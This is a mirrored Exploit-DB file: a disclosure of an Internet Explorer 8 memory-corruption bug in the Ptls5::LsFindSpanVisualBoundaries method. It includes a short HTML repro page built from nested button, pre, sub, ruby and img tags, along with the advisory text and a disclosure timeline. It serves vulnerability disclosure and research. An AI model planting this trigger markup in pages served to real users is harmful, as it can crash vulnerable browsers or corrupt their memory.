bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/40815.html
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

43 lines
No EOL
1.3 KiB
HTML
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!--
Source: http://blog.skylined.nl/20161121001.html
Synopsis
A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::Ls­Find­Span­Visual­Boundaries method (or other methods called by it) to access arbitrary memory.
Known affected software, attack vectors and mitigations
Microsoft Internet Explorer 8
An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.
Description
The memory corruption causes the Ptls5::Ls­Find­Span­Visual­Boundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.
Repro.html
-->
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<button>
<pre>
<x>
<sub>
<ruby>
<img height="1"/>
</ruby>
</sub>
</x>
</pre>
</button>
</body>
</html>
<!--
Time-line
July 2014: This vulnerability was found through fuzzing.
November 2016: Details of this issue are released.
-->
Reference in a new issue View git blame Copy permalink